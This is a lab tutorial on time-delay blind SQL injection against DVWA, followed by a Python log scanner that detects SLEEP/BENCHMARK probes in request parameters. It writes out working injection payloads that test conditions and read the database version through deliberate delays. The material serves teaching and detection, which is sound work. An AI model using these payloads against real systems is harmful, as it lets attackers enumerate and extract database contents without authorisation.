SQL INJECTION - BLIND (II): TIME DELAY BASED ATTACKS
- Layout for this exercise:
1 - Introduction
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Time_delay_Exploitation_technique
- This type of attack uses database commands like sleep() or benchmark() to delay answers in conditional queries.
- sleep(time) suspends the execution of a command for time seconds.
- benchmark(count, expression) executes an expression count times.
- This attack is useful when the attacker doesn't get any kind of answer (result / output / error) from the application because the input has been sanitized.
- Using this method an attacker could enumerate many elements of the database.
- For instance, using sleep(10) and a conditional test for the 1st letter of the database's being 'A': if the answer comes after 10 seconds, we can conclude that the condition is true; otherwise the answer comes back without the delay.
2 - Examples of Time Delay Blind SQL injection
- These time delay based SQL injection exercises are performed from a Kali Linux device against a DVWA version 1.0.8 MySQL database, set to the "medium" security level and hosted on an Ubuntu Linux device running the XAMPP web server.
- Going to the SQL Injection (Blind) tab, the following SQL entries are entered in the User ID form.
2.1) Finding whether the application is responsive to time based attacks
1 UNION SELECT IF (1=1, SLEEP(10), NULL), NULL
- Notice that the Connecting notification lasts for 10 seconds, so we can conclude that the application is responsive to this type of attack.
- The real SQL query would be:
SELECT first_name,last_name FROM users WHERE ID=1
UNION
SELECT IF (1=1,SLEEP(10),NULL),NULL
2.2) Finding whether the database version is 5
1 UNION SELECT IF (SUBSTRING(VERSION(), 1, 1) = 5, SLEEP(10), NULL), NULL
- Again, the result is obtained after waiting for 10 seconds.
- We can conclude that the version is actually 5 (the condition is true) because there is no error message in the answer and the query injection is successful.
- The real SQL query would be:
SELECT first_name,last_name FROM users WHERE ID=1
UNION
SELECT IF (SUBSTRING(version(),1,1)=5, SLEEP(10),NULL),NULL
- The second part of the command consists of IF(condition, true statement, false statement), where:
- condition= SUBSTRING(version(),1,1)=5
- true statement=SLEEP(10)
- false statement=NULL
- SUBSTRING (text, start, length) returns a substring starting from the position "start" of text and of length "length".
- In this case the condition SUBSTRING(version(),1,1)=5 is TRUE because the database version starts with 5 (it is actually 5.5.27), and as a consequence the SLEEP(10) true statement is executed.
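- From the defender's side, the entries above leave two traces in a web server log: a SLEEP()/BENCHMARK() call inside a request parameter and a response time at least as long as the requested delay. The following is an added example, not part of the original exercise, that scans log lines for both. The log format (Apache combined with %D appended), the path /app/user.php and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: Apache combined-style lines with %D (request time in
# microseconds) appended as the last field. Hosts, path and timings are made up.
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /app/user.php?id=1&Submit=Submit HTTP/1.1" 200 4521 31250',
    '192.0.2.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/user.php?id=1+UNION+SELECT+IF+%281%3D1%2C+SLEEP%2810%29%2C+NULL%29%2C+NULL&Submit=Submit HTTP/1.1" 200 4630 10021877',
    '192.0.2.7 - - [01/Jan/2024:10:00:20 +0000] "GET /app/user.php?id=1+UNION+SELECT+IF+%28SUBSTRING%28VERSION%28%29%2C+1%2C+1%29+%3D+5%2C+SLEEP%2810%29%2C+NULL%29%2C+NULL&Submit=Submit HTTP/1.1" 200 4630 10034120',
    # Same first payload sent to a patched endpoint: logged, but no delay.
    '198.51.100.3 - - [02/Jan/2024:09:00:00 +0000] "GET /app/user.php?id=1+UNION+SELECT+IF+%281%3D1%2C+SLEEP%2810%29%2C+NULL%29%2C+NULL&Submit=Submit HTTP/1.1" 200 4400 28110',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) \S+ (\d+)$')
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(\s*(\d+)', re.IGNORECASE)

def find_time_delay_probes(lines):
    """Return one finding per request whose decoded parameters call SLEEP/BENCHMARK."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line.strip())
        if not m:
            continue  # not a request line in the assumed format
        target, _status, micros = m.groups()
        elapsed = int(micros) / 1_000_000
        # parse_qsl percent-decodes values and turns '+' into spaces
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hit = DELAY_RE.search(value)
            if not hit:
                continue
            func, arg = hit.group(1).lower(), int(hit.group(2))
            # SLEEP takes seconds: a response at least that slow means the
            # statement ran in the database, so the parameter is injectable.
            # BENCHMARK takes an iteration count, so it is reported as an attempt.
            executed = func == "sleep" and arg > 0 and elapsed >= arg
            findings.append({"param": name, "function": func, "argument": arg,
                             "elapsed_s": round(elapsed, 2),
                             "verdict": "delay executed" if executed else "attempt only"})
            break  # one finding per request
    return findings

if __name__ == "__main__":
    for finding in find_time_delay_probes(SAMPLE_LOG):
        print(finding)
```

A "delay executed" verdict marks requests whose condition evaluated to true in the database, which is what an investigator needs to reconstruct what an attacker learned; "attempt only" marks probes that were sent but did not produce the delay.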